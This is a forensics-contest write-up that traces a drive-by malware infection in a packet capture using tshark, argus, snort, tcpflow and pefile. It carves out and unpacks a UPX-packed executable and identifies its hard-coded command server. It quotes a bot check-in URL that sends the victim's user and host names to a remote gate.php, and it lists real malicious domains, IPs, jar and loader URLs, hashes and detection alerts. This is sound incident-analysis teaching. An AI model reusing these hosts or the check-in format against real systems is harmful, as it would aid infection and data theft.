Name: dn1nj4 

Description: 
Forensicscontest.com Puzzle #5
------------------------------------------------

Before diving into the actual packet capture, I wanted to get some idea of what I was going to be dealing with.  I began by gathering high-level protocol statistics about the capture using Wireshark's (http://www.wireshark.org/) command-line interface, tshark, with the following command:

$ tshark -q -z io,phs -r puzzle5_infected.pcap

===================================================================
Protocol Hierarchy Statistics
Filter: frame

frame                                    frames:303 bytes:188538
  eth                                    frames:303 bytes:188538
    ip                                   frames:303 bytes:188538
      udp                                frames:18 bytes:2060
        dns                              frames:12 bytes:1454
        nbns                             frames:6 bytes:606
      tcp                                frames:285 bytes:186478
        http                             frames:110 bytes:129890
          data-text-lines                frames:6 bytes:4098
        tcp.segments                     frames:4 bytes:1913
          http                           frames:3 bytes:1730
            data-text-lines              frames:1 bytes:136
            media                        frames:2 bytes:1594
          ssl                            frames:1 bytes:183
        ssl                              frames:8 bytes:7008
        data                             frames:1 bytes:317
===================================================================

So traffic-wise, we can expect to see at least DNS, some NetBIOS name service traffic, HTTP and SSL.

Second, I wanted to get an idea of all of the host IP addresses involved.  Using Qosient's argus toolset (http://www.qosient.com/argus/), I generated a binary network flow dataset with the command:

$ argus -r puzzle5_infected.pcap -w puzzle5_infected.bin

With the binary argus data in hand, we can generate a list of all the unique IP addresses present and how many bytes were transferred in each direction using the following command:

$ racluster -M rmon -nn -c "," -m saddr -r puzzle5_infected.bin -L0 -s saddr sbytes dbytes

Host,OutBytes,InBytes
192.168.23.2,1026,758
192.168.23.129,11139,177399
59.53.91.102,168062,7493
65.55.195.250,6011,1782
212.252.32.20,2060,547
213.155.29.144,240,559

So we are dealing with 2 non-routable IP addresses (192.168.23.x) and 4 external IP addresses.  With a quick Linux command line we can pull all of the related whois information for these IP addresses:

$ racluster -M rmon -nn -m saddr -r puzzle5_infected.bin -L0 -s saddr | egrep -v "192\.168\.23\." | gawk '{ system("jwhois " $0); }' > all_whois.txt

This command reruns racluster, outputting only the IP addresses.  It then uses egrep to strip out the local IP addresses.  Finally, it uses "gawk" to run "jwhois" against each remaining IP address and stores the output in the text file all_whois.txt.
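
The same filtering step can be sketched in Python.  This is only an illustration, not part of the original workflow: it uses the standard "ipaddress" module instead of a regular expression to drop the private addresses, and the host list is copied from the racluster output above.  The function name external_hosts is made up for this example.

```python
import ipaddress

def external_hosts(addresses):
    """Keep only addresses that are not private (RFC 1918 and similar)."""
    return [a for a in addresses if not ipaddress.ip_address(a).is_private]

# Hosts reported by racluster earlier in this writeup.
hosts = [
    "192.168.23.2",
    "192.168.23.129",
    "59.53.91.102",
    "65.55.195.250",
    "212.252.32.20",
    "213.155.29.144",
]

external = external_hosts(hosts)
for ip in external:
    # Each of these would then be handed to a whois client such as jwhois.
    print(ip)
```

Checking for private ranges by address class rather than by pattern means the filter keeps working if the capture had used 10.x or 172.16.x addressing instead.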

A quick trip through the all_whois.txt file shows us a Chinese IP, a Microsoft IP, and a Turkish IP.  The last IP lists "NA" as the country, which is Namibia's country code, but the address information is listed as "UA," which is Ukraine.  A quick Google search for the description field "Datacenter Hosting.UA" confirms the IP range is registered to Ukraine.

inetnum:      	59.52.0.0 - 59.55.255.255
descr:        	CHINANET Jiangxi province network
country:      	CN

NetRange:   	65.52.0.0 - 65.55.255.255
CIDR:       	65.52.0.0/14
OrgName:    	Microsoft Corp
Country:    	US

inetnum:        212.252.32.0  - 212.252.33.255
netname:        Vital
descr:          Vital Teknoloji
country:        TR

inetnum:        213.155.29.144 - 213.155.29.151
netname:        alexjohnes
descr:          alexjohnes - Taras Zadorojniy
country:        NA
address:        UA,74800, Kahovka ,Voroshilova str. 1, apt. 20
descr:          Datacenter Hosting.UA

Interestingly, the Google search for "Datacenter Hosting.UA" also revealed something unexpected. MalwareURL.com has a list of 68 different domains serving up malware hosted by Datacenter Hosting.UA (http://www.malwareurl.com/listing.php?as=AS41665).

Our original IP address listed by racluster, 213.155.29.144, is also listed on the site as redirecting to a fake scan page at analytics-google.net.  This could serve as an early indication as to what we're dealing with.

Knowing that we are dealing with some publicly identified malware sites, I next opted to run the packet capture through snort (http://www.snort.org), with the latest signatures from Emerging Threats (http://www.emergingthreats.org).  This was accomplished using the following command to instruct snort to log "fast" alerts to the current directory using /etc/snort/snort.conf as a configuration file:

$ snort -A fast -l . -c /etc/snort/snort.conf -r puzzle5_infected.pcap

* Note: I configured snort's "HOME_NET" variable in snort.conf to be "192.168.23.0/24", which appears to be the local IP range for Ms. Moneymany's network.

As a result, Snort generated 4 alerts: 

03/16-17:50:38.500087  [**] [1:2010438:3] ET MALWARE Possible Malicious Applet Access (justexploit kit) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.23.129:1064 -> 59.53.91.102:80

03/16-17:51:05.397195  [**] [1:2009550:2] ET TROJAN Banker PWS/Infostealer HTTP GET Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.23.129:1069 -> 212.252.32.20:80

03/16-17:51:05.397195  [**] [1:2010789:3] ET TROJAN SpyEye Bot Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.23.129:1069 -> 212.252.32.20:80

03/16-17:51:05.397195  [**] [1:2002400:21] ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.23.129:1069 -> 212.252.32.20:80

Looking at the source ports, 2 connections generated these 4 alerts.  Both were port 80 connections.  Chinese IP 59.53.91.102 looks like it might be the source of at least one of the two malicious Java applets, and Turkish IP 212.252.32.20 received a malware callback.  It is likely that this is the callback for the downloaded executable, but we'll see.
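
For a larger alert file, the "which connections fired which alerts" question can be answered mechanically.  The following is a rough Python sketch, not something used in the original analysis: it assumes alerts in the "fast" format shown above, and the regular expression and the function name group_alerts are my own.

```python
import re
from collections import defaultdict

# Matches the signature message and the "src -> dst" pair of a fast alert.
ALERT_RE = re.compile(
    r"\[\*\*\] \[(?P<sid>[\d:]+)\] (?P<msg>.*?) \[\*\*\]"
    r".*\{(?P<proto>\w+)\} (?P<src>\S+) -> (?P<dst>\S+)"
)

def group_alerts(lines):
    """Map (source ip:port, destination ip:port) to the alert messages seen."""
    flows = defaultdict(list)
    for line in lines:
        m = ALERT_RE.search(line)
        if m:
            flows[(m["src"], m["dst"])].append(m["msg"].strip())
    return dict(flows)

COMMON = "[Classification: A Network Trojan was detected] [Priority: 1] {TCP} "
alerts = [
    "03/16-17:50:38.500087 [**] [1:2010438:3] ET MALWARE Possible Malicious "
    "Applet Access (justexploit kit) [**] " + COMMON
    + "192.168.23.129:1064 -> 59.53.91.102:80",
    "03/16-17:51:05.397195 [**] [1:2009550:2] ET TROJAN Banker PWS/Infostealer "
    "HTTP GET Checkin [**] " + COMMON + "192.168.23.129:1069 -> 212.252.32.20:80",
    "03/16-17:51:05.397195 [**] [1:2010789:3] ET TROJAN SpyEye Bot Checkin [**] "
    + COMMON + "192.168.23.129:1069 -> 212.252.32.20:80",
    "03/16-17:51:05.397195 [**] [1:2002400:21] ET USER_AGENTS Suspicious User "
    "Agent (Microsoft Internet Explorer) [**] " + COMMON
    + "192.168.23.129:1069 -> 212.252.32.20:80",
]

flows = group_alerts(alerts)
for (src, dst), messages in flows.items():
    print(src, "->", dst, ":", len(messages), "alert(s)")
```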

Next up, chaosreader (http://sourceforge.net/projects/chaosreader/).  Chaosreader is a circa 2004 perl script that attempts to parse a packet capture and extract its component pieces.  It generates logs of activity and an easy to navigate HTML page with information on each session.  To use it, I ran the following command:

$ perl chaosreader0.94 -r puzzle5_infected.pcap

This resulted in the following files: 
getpost.html               session_0004.part_01.html  session_0012.http.raw1     stream_0005.domain.raw2
httplog.text               session_0006.http.html     session_0012.http.raw2     stream_0008.netbios-ns.raw
image.html                 session_0006.http.raw      session_0012.part_01.data  stream_0008.netbios-ns.raw1
index.html                 session_0006.http.raw1     session_0013.snpp.raw      stream_0008.netbios-ns.raw2
index.text                 session_0006.http.raw2     session_0013.snpp.raw1     stream_0009.domain.html
session_0002.http.html     session_0006.part_01.zip   session_0013.snpp.raw2     stream_0009.domain.raw
session_0002.http.raw      session_0007.http.html     session_0015.http.html     stream_0009.domain.raw1
session_0002.http.raw1     session_0007.http.raw      session_0015.http.raw      stream_0009.domain.raw2
session_0002.http.raw2     session_0007.http.raw1     session_0015.http.raw1     stream_0010.netbios-ns.raw
session_0002.part_01.gz    session_0007.http.raw2     session_0015.http.raw2     stream_0010.netbios-ns.raw1
session_0002.part_02.data  session_0007.part_01.zip   session_0015.part_01.html  stream_0010.netbios-ns.raw2
session_0003.https.raw     session_0011.http.html     stream_0001.domain.html    stream_0014.domain.html
session_0003.https.raw1    session_0011.http.raw      stream_0001.domain.raw     stream_0014.domain.raw
session_0003.https.raw2    session_0011.http.raw1     stream_0001.domain.raw1    stream_0014.domain.raw1
session_0004.http.html     session_0011.http.raw2     stream_0001.domain.raw2    stream_0014.domain.raw2
session_0004.http.raw      session_0011.part_01.data  stream_0005.domain.html
session_0004.http.raw1     session_0012.http.html     stream_0005.domain.raw
session_0004.http.raw2     session_0012.http.raw      stream_0005.domain.raw1

Based on the file names, chaosreader identified 14 data streams: http, https, domain and netbios.  These protocols match up with what we were expecting from the original tshark protocol output.  Looking at these lines in the httplog.text file, we can start to address some of the questions in the challenge:

1268758238.473   1186 192.168.23.129 TCP_HIT/200 5573 GET http://59.53.91.102/q.jar - NONE/- application/x-java-archive
1268758238.500   4335 192.168.23.129 TCP_HIT/200 7079 GET http://59.53.91.102/sdfg.jar - NONE/- application/x-java-archive

So the names of the two Java archives were q.jar and sdfg.jar.

The httplog.text file also contains the following request:
1268758265.397    248 192.168.23.129 TCP_NEGATIVE_HIT/404 0 GET http://212.252.32.20/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed - NONE/- text/html

But what does that mean?  Some quick Googling for threatexpert and gate.php returned another malwareURL.com page of interest (http://www.malwareurl.com/listing.php?domain=freeways.in).  That page lists the following format for malicious URLs which look suspiciously like the one above: 

/11111/gate.php?guid=USERNAME!COMPUTERNAME!00CD1A40&ver=10084&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

This means Ms. Moneymany's username was ADMINISTRATOR at the time she was compromised and her system name is TICKLABS-LZ.  Based on the above variable called "md5", we also know that the md5 hash of the malicious executable is 5942ba36cf732097479c51986eee91ed.
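
To make the field extraction explicit, here is a small Python sketch that splits the check-in URL into its parameters.  It assumes, based only on the MalwareURL.com template above, that "guid" is USERNAME!COMPUTERNAME!<suffix>; the meaning of the third field is not known, so it is simply carried along as "suffix".  The function name parse_checkin is made up for this example.

```python
from urllib.parse import urlsplit, parse_qs

def parse_checkin(url):
    """Split a gate.php check-in URL into the fields of interest."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    # Assumed layout from the published template: USERNAME!COMPUTERNAME!<suffix>
    user, host, suffix = params["guid"].split("!", 2)
    return {
        "user": user,
        "host": host,
        "suffix": suffix,  # uninterpreted third field of guid
        "version": params["ver"],
        "md5": params["md5"],
    }

url = (
    "http://212.252.32.20/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1"
    "&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92"
    "&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed"
)

info = parse_checkin(url)
for key, value in info.items():
    print(key, "=", value)
```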

Given that the httplog.text generated by chaosreader is chronological, the first entry will be the first request.  In this case, the first entry is:

1268758218.364   2903 192.168.23.129 TCP_HIT/200 0 GET http://59.53.91.102/true.php - NONE/- text/html;

So now we have the URL, but what was the associated domain?  By looking in the "raw" output files from chaosreader we can get a better idea of the session traffic.  Which stream is it?  Grep to the rescue:

$ egrep -l "true.php" *.raw
session_0002.http.raw

The "-l" option instructs egrep to print only the names of files that contain a match for the regular expression.  In this case, the file of interest is "session_0002.http.raw".  Listing the file contents shows the original request header:

GET /true.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: nrtjo.eu
Connection: Keep-Alive

Looking at the "Host" field, we can discern that the original link Ms. Moneymany clicked on was actually "hxxp://nrtjo.eu/true.php".

Now, where is that executable? Taking a shot in the dark, I first tried another egrep, this time for the "MZ" signature that begins every Windows PE executable, with the following command:

$ egrep -l "MZ" *.raw
session_0011.http.raw
session_0012.http.raw

Interesting!  So it looks like two different sessions may contain executables.  Listing the contents of these files we see requests for:

GET //loading.php?spl=javadnw&J050006010 HTTP/1.1
GET //loading.php?spl=javad0 HTTP/1.1

And in both HTTP responses we see: 

Content-Disposition: inline; filename=file.exe

So it's entirely plausible that the same file was actually downloaded twice.  Given past experience with chaosreader, I don't fully trust the session reconstruction algorithms.  So, I switched over to tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/ ) to rebuild the sessions for me. 

$ tcpflow -r puzzle5_infected.pcap
$ ls 
059.053.091.102.00080-192.168.023.129.01061
059.053.091.102.00080-192.168.023.129.01063
059.053.091.102.00080-192.168.023.129.01064
059.053.091.102.00080-192.168.023.129.01065
059.053.091.102.00080-192.168.023.129.01066
059.053.091.102.00080-192.168.023.129.01067
065.055.195.250.00443-192.168.023.129.01062
192.168.023.129.01061-059.053.091.102.00080
192.168.023.129.01062-065.055.195.250.00443
192.168.023.129.01063-059.053.091.102.00080
192.168.023.129.01064-059.053.091.102.00080
192.168.023.129.01065-059.053.091.102.00080
192.168.023.129.01066-059.053.091.102.00080
192.168.023.129.01067-059.053.091.102.00080
192.168.023.129.01068-213.155.029.144.00444
192.168.023.129.01069-212.252.032.020.00080
212.252.032.020.00080-192.168.023.129.01069

As you can see above, tcpflow reconstructed sessions into individual files containing data for each side of each session.  Sessions are tagged by <ip>.<port>-<ip>.<port>.  Searching for the two MZ headers again: 

$ egrep -l MZ *
059.053.091.102.00080-192.168.023.129.01066
059.053.091.102.00080-192.168.023.129.01067

So in two sessions of port 80 response traffic from 59.53.91.102 we find the two PE header strings.  In order to parse out the executables from the HTTP chunked encoding, I've thrown together a quick script called unchunk.pl that will copy out the chunks, reassemble them and write this data to an output file:

$ perl ./unchunk.pl 059.053.091.102.00080-192.168.023.129.01066 file1.exe
$ perl ./unchunk.pl 059.053.091.102.00080-192.168.023.129.01067 file2.exe
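
The unchunk.pl script itself is not reproduced here.  For readers who want to follow along, the following Python sketch shows the general idea of reversing HTTP chunked transfer encoding.  It is a hypothetical stand-in rather than the actual script, and it assumes the flow file holds a single chunked response; function names are my own.

```python
def split_http_response(raw: bytes):
    """Separate the header block from the body at the first blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body

def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked body: <hex size>CRLF<data>CRLF ... 0 CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        # The size line may carry ";extension" text, which is ignored here.
        size_field = body[pos:eol].split(b";", 1)[0].strip()
        size = int(size_field.decode("ascii"), 16)
        if size == 0:
            break  # zero-length chunk marks the end of the body
        start = eol + 2
        out += body[start:start + size]
        pos = start + size + 2  # skip the CRLF that follows the chunk data
    return bytes(out)

# Tiny synthetic response used only to exercise the functions.
sample = (
    b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"4\r\nMZ\x90\x00\r\n"
    b"3\r\nabc\r\n"
    b"0\r\n\r\n"
)
head, body = split_http_response(sample)
payload = dechunk(body)
print(len(payload), "bytes recovered")
```

To use it on a tcpflow file, one would read the file in binary mode, pass the contents through split_http_response and dechunk, and write the result out as the .exe.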

Using the Linux "file" command, we can verify that the header information is correct:

$ file *.exe
file1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
file2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Running the Linux "md5sum" command on both files resulted in an identical hash, meaning we are only dealing with a single file, downloaded twice.

$ md5sum file*
5942ba36cf732097479c51986eee91ed  file1.exe
5942ba36cf732097479c51986eee91ed  file2.exe

So we see above that our MD5 hash matches that of the earlier URL report.

Next we need to determine the type of packing.  I started by extracting the section names from the executable.  For this, I turned to Python's pefile (http://code.google.com/p/pefile/ ) and the following commands :

$ python
>>> import pefile
>>> pe = pefile.PE('file2.exe')
>>> for section in pe.sections:
...     print section.Name
...
UPX0
UPX1
.rsrc

So this reveals the common UPX packer, housed at http://upx.sourceforge.net/ .  Thankfully, UPX provides the ability to automatically unpack itself:

$ upx -d file1.exe
       File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     82432 <-     68096   82.61%    win32/pe     test.exe
Unpacked 1 file.

Looks like it worked!

Next we'll get the MD5 hash of the unpacked file.

$ md5sum file1.exe
0f37839f48f7fc77e6d50e14657fb96e file1.exe

The final question we've been asked to answer is what hard-coded IP address the file connects to. A simple "strings" on the uncompressed file failed to reveal the IP, so it looks like we'll need to compare DNS response traffic to IP address connections.  Leveraging tcpdump, we can pull from the packet capture all of the ASCII text DNS traffic.  Then, we will parse out only the "A" record responses.  This then becomes a simple problem of text processing, for which I turned again to perl and a quick script I've called dnsmap.pl.  Each of the tcpdump output lines containing DNS "A" record responses will be piped into dnsmap.pl via the Linux gawk command:

$ tcpdump -r puzzle5_infected.pcap -nn -vvv udp and port 53 | egrep " A " | gawk '{ system("perl dnsmap.pl \"" $0 "\""); }'

Domain: nrtjo.eu.               	  Response: 59.53.91.102
Domain: freeways.in.            Response: 208.76.61.100,212.252.32.20,208.76.62.100,208.76.63.100,208.76.60.100

We know from our earlier racluster analysis that there are 4 external IP addresses.  Based on the dnsmap.pl results, 59.53.91.102 and 212.252.32.20 already have resolutions.  If we needed to validate a larger data set, we could simply create a regex from the dnsmap.pl output to use as an exclusion list for our earlier racluster results, as such:

$ racluster -M rmon -nn -m saddr -r puzzle5_infected.bin -L0 -s saddr | egrep -v "59.53.91.102|208.76.61.100|212.252.32.20|208.76.62.100|208.76.63.100|208.76.60.100"
    Host
     65.55.195.250
      192.168.23.2
    192.168.23.129
    213.155.29.144
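
The same exclusion can be expressed as a set lookup instead of a regular expression, which avoids the unescaped dots in the pattern above matching any character.  The sketch below is illustrative only: it parses lines in the dnsmap.pl output format shown earlier and filters the racluster host list; the names resolved_ips and DNSMAP_LINE are my own.

```python
import re

# Matches lines of the form "Domain: <name>   Response: <ip>[,<ip>...]"
DNSMAP_LINE = re.compile(r"Domain:\s*(\S+)\s+Response:\s*(\S+)")

def resolved_ips(lines):
    """Collect every IP address that appeared in a DNS A response."""
    ips = set()
    for line in lines:
        m = DNSMAP_LINE.search(line)
        if m:
            ips.update(m.group(2).split(","))
    return ips

dnsmap_output = [
    "Domain: nrtjo.eu.               Response: 59.53.91.102",
    "Domain: freeways.in.            Response: 208.76.61.100,212.252.32.20,"
    "208.76.62.100,208.76.63.100,208.76.60.100",
]
observed = [
    "192.168.23.2", "192.168.23.129", "59.53.91.102",
    "65.55.195.250", "212.252.32.20", "213.155.29.144",
]

known = resolved_ips(dnsmap_output)
unresolved = [h for h in observed if h not in known]
print(unresolved)
```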

Removing the two internal 192.168.23.x addresses, we are left with 2 candidate IPs: 65.55.195.250 (Microsoft, US) and 213.155.29.144 (alexjohnes, Ukraine).  While my gut instinct says the 213 is absolutely the bad guy, we need something more concrete.  How about time-sequence analysis?

Whichever IP address is the culprit is supposed to be hard-coded in the malware.  That means the connection could only have happened *after* the file was downloaded.  Using tcpdump we can get the order of connections by pulling out all of the packets with only the "SYN" flag set (byte 13 of the TCP header equal to 2):

$ tcpdump -r puzzle5_infected.pcap -nn -q 'tcp[13] = 2'
reading from file puzzle5_infected.pcap, link-type EN10MB (Ethernet)
17:50:17.701672 IP 192.168.23.129.1061 > 59.53.91.102.80: tcp 0
17:50:21.420447 IP 192.168.23.129.1062 > 65.55.195.250.443: tcp 0
17:50:34.546057 IP 192.168.23.129.1063 > 59.53.91.102.80: tcp 0
17:50:34.841573 IP 192.168.23.129.1064 > 59.53.91.102.80: tcp 0
17:50:34.842707 IP 192.168.23.129.1065 > 59.53.91.102.80: tcp 0
17:50:37.755259 IP 192.168.23.129.1064 > 59.53.91.102.80: tcp 0
17:50:37.755282 IP 192.168.23.129.1065 > 59.53.91.102.80: tcp 0
17:50:48.981429 IP 192.168.23.129.1066 > 59.53.91.102.80: tcp 0
17:50:49.968107 IP 192.168.23.129.1067 > 59.53.91.102.80: tcp 0
17:50:52.942530 IP 192.168.23.129.1067 > 59.53.91.102.80: tcp 0
17:51:01.726678 IP 192.168.23.129.1068 > 213.155.29.144.444: tcp 0
17:51:05.114322 IP 192.168.23.129.1069 > 212.252.32.20.80: tcp 0

Based on the naming convention of our tcpflow output files, the two connections where the executable was downloaded were source ports 1066 and 1067.  Thus the only two choices for the hard-coded IP based on time-sequence analysis are 213.155.29.144 and 212.252.32.20.  Cross-referencing these two IPs against the dnsmap.pl results, 212.252.32.20 was returned by the DNS lookup for freeways.in, so we are left with a single IP: 213.155.29.144.
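
The elimination logic above can be written down as a short Python sketch.  It is a restatement of the reasoning, not a tool used during the analysis: the SYN list is copied from the tcpdump output, the download ports come from the tcpflow file names, and the resolved set comes from the dnsmap.pl results.  Note that a SYN timestamp is only a lower bound on when a download finished.  The function name hardcoded_candidates is made up for this example.

```python
def hardcoded_candidates(syns, download_ports, dns_resolved):
    """Destinations first contacted after the download connections began,
    excluding any address that was handed out in a DNS response."""
    cutoff = max(t for t, sport, _, _ in syns if sport in download_ports)
    later = []
    for t, _, dst, _ in syns:
        # Timestamps share one fixed-width format, so string order is time order.
        if t > cutoff and dst not in later:
            later.append(dst)
    return [ip for ip in later if ip not in dns_resolved]

# (time, source port, destination IP, destination port) from the SYN listing.
syns = [
    ("17:50:17.701672", 1061, "59.53.91.102", 80),
    ("17:50:21.420447", 1062, "65.55.195.250", 443),
    ("17:50:34.546057", 1063, "59.53.91.102", 80),
    ("17:50:34.841573", 1064, "59.53.91.102", 80),
    ("17:50:34.842707", 1065, "59.53.91.102", 80),
    ("17:50:37.755259", 1064, "59.53.91.102", 80),
    ("17:50:37.755282", 1065, "59.53.91.102", 80),
    ("17:50:48.981429", 1066, "59.53.91.102", 80),
    ("17:50:49.968107", 1067, "59.53.91.102", 80),
    ("17:50:52.942530", 1067, "59.53.91.102", 80),
    ("17:51:01.726678", 1068, "213.155.29.144", 444),
    ("17:51:05.114322", 1069, "212.252.32.20", 80),
]
dns_resolved = {
    "59.53.91.102", "208.76.61.100", "212.252.32.20",
    "208.76.62.100", "208.76.63.100", "208.76.60.100",
}

result = hardcoded_candidates(syns, {1066, 1067}, dns_resolved)
print(result)
```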